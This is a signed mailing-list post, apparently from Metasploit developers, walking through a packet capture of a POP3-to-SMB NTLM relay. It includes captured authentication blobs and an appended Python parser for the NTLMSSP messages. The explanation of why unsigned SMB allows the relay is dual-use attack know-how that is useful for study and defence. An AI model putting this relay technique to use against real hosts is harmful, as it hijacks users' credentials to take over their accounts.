-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Well, this is a summary of the results of testing this POP3 secure-connection related issue. I initially missed checking "Use Security Authentication" for the POP account, but after that I got the results. I tried to summarize the most important fields here. It may be redundant, or if I missed something please let me know.

This is the POP traffic. Here *.*.*.1 is the attacker and *.*.*.2 the victim:

========================================================================
# Initial fake banner POP response
435  9.999064   *.*.*.1  *.*.*.2  POP  Response: +OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 ready

# Request for Auth: Request command: AUTH, Request parameter: NTLM
441  10.074902  *.*.*.2  *.*.*.1  POP  Request: AUTH NTLM
465  10.281719  *.*.*.1  *.*.*.2  POP  Continuation

# Response with Authorization from client
478  10.603152  *.*.*.2  *.*.*.1  POP  Request: TlRM****AAAAGAAYAG4AAAAYABgAhgAAAAYABgBIAAAAGgAaAE4AAAAGAAYAaAAAAAAAAACeAAAABYIAAgUBKAoAAAAPVwBTADIAQQBkAG0AaQBuAGkAcwB0AHIAYQBkAG8AcgBXAFMAMgBj9DfMoj1zHGP0N8yiPXMcY/Q3zKI9cxygdKPIln4+Q+YFSxsQz2uo6nAJ1a/vs+I=

# Log in client
508  11.232840  *.*.*.1  *.*.*.2  POP  Response: +OK User successfully logged on.

# STAT pop3 simple command
509  11.245222  *.*.*.2  *.*.*.1  POP  Request: STAT
=====================================================================

And the SMB one; here I'll try to put more info about SMB:

=====================================================================
# Handshake
454  10.188783  *.*.*.1  *.*.*.2  SMB  Negotiate Protocol Request

Of course a 0x72 negotiate header, and then here are the dialects (sorry about the verbosity):

Requested Dialects:
    Dialect: PYTHON SMB 0.1
    Dialect: LANMAN1.0
    Dialect: Windows for Workgroups 3.1a
    Dialect: LM1.2X002
    Dialect: LANMAN2.1
    Dialect: NT LM 0.12

The victim's response (relevant fields only):
    Dialect Index: 5, greater than LANMAN2.1
    Security Mode: 0x03 (USER security, ENCRYPTED pwd, Chall/Resp, Signatures disabled and not required)

This is interesting:

461  10.226109  *.*.*.1  *.*.*.2  SMB  Session Setup AndX Request, NTLMSSP_NEGOTIATE
    Security Blob: 4E544C4D535350000100000007B200000000000000000000...
        NTLMSSP
            NTLMSSP identifier: NTLMSSP
            NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001)
            Flags: 0x0000b207 (Negotiate Always Sign | Negotiate Workstation Supplied | Negotiate Domain | Negotiate NTLM key | Request Target | Negotiate OEM | Negotiate UNICODE)
    Native OS: Windows 2000 2195
    Native LAN Manager: Windows 2000 5.0

464  10.281135  *.*.*.2  *.*.*.1  SMB  Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
# Session Setup AndX Response:
    Action: 0x0000 (Not logged in as GUEST)
    Security Blob:
        NTLMSSP
            NTLMSSP identifier: NTLMSSP
            NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
            Reserved: 0
    Native OS: 5.1
    Native LAN Manager: Windows 2000 LAN Manager

480  10.603844  *.*.*.1  *.*.*.2  SMB  Session Setup AndX Request, NTLMSSP_AUTH, User: WS2\Admin
# NTLMSSP
    NTLMSSP Message Type: NTLMSSP_AUTH (0x03)
    Lan Manager Response: 6F437CCA23D731C63...
    NTLM Response: A074A3C8967E3E43E6...
    Domain, Username, and Hostname...

506  11.232199  *.*.*.2  *.*.*.1  SMB  Session Setup AndX Response, STATUS_SUCCESS
513  11.259777  *.*.*.1  *.*.*.2  SMB  Tree Connect AndX Request, Path: \\*.*.*.2\IPC$
======================================================================

After 513, we can agree that the rest is history; we're interested in the negotiation here.

Sincerely.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJUT6JH+KgkfcIQ8cRAuacAKCqkUUMG0/8qpGQqoFw4lHt5NlPBQCfeqss
Iz3Jm/nYjgzXv1kdbvOwhQA=
=CEuB
-----END PGP SIGNATURE-----
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
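To make the blobs in the capture above concrete, here is an added Python example (editor's code, not the poster's and not Metasploit's) that decodes the NTLMSSP_NEGOTIATE hex from frame 461, shows the one transformation the relay performs on frame 478 (POP3 carries the NTLM message base64-encoded on one line, SMB carries the same bytes raw in the Session Setup AndX security blob), parses a constructed NTLMSSP_AUTH message of that shape, and decodes the SMB1 SecurityMode byte 0x03 that makes the relay viable. Only the 24 NEGOTIATE bytes are taken from the capture; the AUTHENTICATE sample, its placeholder LM/NT responses, the CHALLENGE bytes and all function names are constructed for this example.

```python
"""Decode the NTLMSSP messages and the SMB1 SecurityMode byte from a
POP3 -> SMB NTLM relay capture like the one above.

Added example, not code from the original post or from Metasploit.
NEGOTIATE_HEX is the 24 bytes printed in the capture; every other
message and value below is constructed for illustration.
"""
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3

# Subset of MS-NLMP NegotiateFlags (section 2.2.2.5) needed to read the capture.
NEGOTIATE_FLAGS = {
    0x00000001: "NEGOTIATE_UNICODE",
    0x00000002: "NEGOTIATE_OEM",
    0x00000004: "REQUEST_TARGET",
    0x00000010: "NEGOTIATE_SIGN",
    0x00000020: "NEGOTIATE_SEAL",
    0x00000200: "NEGOTIATE_NTLM",
    0x00001000: "OEM_DOMAIN_SUPPLIED",
    0x00002000: "OEM_WORKSTATION_SUPPLIED",
    0x00008000: "NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x40000000: "NEGOTIATE_KEY_EXCH",
}

# The 24 bytes of the NTLMSSP_NEGOTIATE security blob shown in frame 461.
NEGOTIATE_HEX = "4E544C4D535350000100000007B200000000000000000000"


def decode_flags(flags):
    """Names of the set NegotiateFlags bits, lowest bit first."""
    return [name for bit, name in sorted(NEGOTIATE_FLAGS.items()) if flags & bit]


def _buffer(blob, at):
    """Read an NTLM security buffer (Len:2, MaxLen:2, Offset:4, little-endian)
    located at header offset `at` and return the bytes it points to."""
    length, _maxlen, start = struct.unpack_from("<HHI", blob, at)
    return blob[start:start + length]


def parse_ntlmssp(blob):
    """Parse a raw NTLMSSP message (types 1, 2 and 3) into a dict."""
    if not blob.startswith(NTLMSSP_SIGNATURE):
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    if msg_type == NEGOTIATE:
        flags = struct.unpack_from("<I", blob, 12)[0]
        return {"type": "NEGOTIATE", "flags": flags, "flag_names": decode_flags(flags)}
    if msg_type == CHALLENGE:
        flags = struct.unpack_from("<I", blob, 20)[0]
        return {"type": "CHALLENGE", "flags": flags, "flag_names": decode_flags(flags),
                "server_challenge": blob[24:32].hex()}
    if msg_type == AUTHENTICATE:
        flags = struct.unpack_from("<I", blob, 60)[0]
        codec = "utf-16-le" if flags & 0x1 else "ascii"
        return {
            "type": "AUTHENTICATE", "flags": flags, "flag_names": decode_flags(flags),
            "lm_response": _buffer(blob, 12).hex(),
            "nt_response": _buffer(blob, 20).hex(),
            "domain": _buffer(blob, 28).decode(codec),
            "user": _buffer(blob, 36).decode(codec),
            "workstation": _buffer(blob, 44).decode(codec),
        }
    raise ValueError("unknown NTLMSSP message type %d" % msg_type)


def build_authenticate(domain, user, workstation, lm_response, nt_response,
                       flags=0x00008205):
    """Construct a minimal NTLMSSP_AUTHENTICATE message (UTF-16LE strings,
    no Version or MIC) so the parser can be exercised without a capture."""
    header_len = 64          # 8 sig + 4 type + 6 buffers * 8 + 4 flags
    fields, payload = b"", b""
    for data in (lm_response, nt_response,
                 domain.encode("utf-16-le"), user.encode("utf-16-le"),
                 workstation.encode("utf-16-le"), b""):   # last: session key
        fields += struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload += data
    return (NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE)
            + fields + struct.pack("<I", flags) + payload)


def pop3_to_smb_blob(pop3_line):
    """Frame 478 -> frame 480: the POP3 client sends the NTLM message base64
    on one line; the relay forwards the decoded bytes as the SMB security blob."""
    return base64.b64decode(pop3_line.strip())


def smb_blob_to_pop3_line(blob):
    """Frame 464 -> frame 465: the server's CHALLENGE blob goes back to the
    POP3 client base64-encoded in the '+ ' continuation line."""
    return base64.b64encode(blob).decode()


def smb1_security_mode(mode):
    """Decode the SecurityMode byte of an SMB1 Negotiate Protocol response."""
    return {
        "user_level_security": bool(mode & 0x01),
        "challenge_response": bool(mode & 0x02),
        "signing_enabled": bool(mode & 0x04),
        "signing_required": bool(mode & 0x08),
    }


def relay_viable(mode):
    """The relay only forwards the three NTLM messages and never learns the
    session key, so it cannot sign; the relayed session only works when the
    server does not require signing (0x03 in the capture has no bit 3)."""
    return not smb1_security_mode(mode)["signing_required"]


if __name__ == "__main__":
    print(parse_ntlmssp(bytes.fromhex(NEGOTIATE_HEX)))
    # Constructed AUTHENTICATE with placeholder responses (not the capture's).
    auth = build_authenticate("WS2", "Admin", "WS2",
                              b"\x6f\x43\x7c\xca" * 6, b"\xa0\x74\xa3\xc8" * 6)
    print(parse_ntlmssp(pop3_to_smb_blob(smb_blob_to_pop3_line(auth))))
    print(smb1_security_mode(0x03), relay_viable(0x03))
```

Running it prints the seven flag names that Wireshark lists for 0x0000b207, the domain, user, workstation and LM/NT response hex recovered from the constructed AUTH message after its base64 round trip, and the 0x03 decode with signing neither enabled nor required, which is why the Session Setup in frame 506 returns STATUS_SUCCESS for a session the attacker could never have signed.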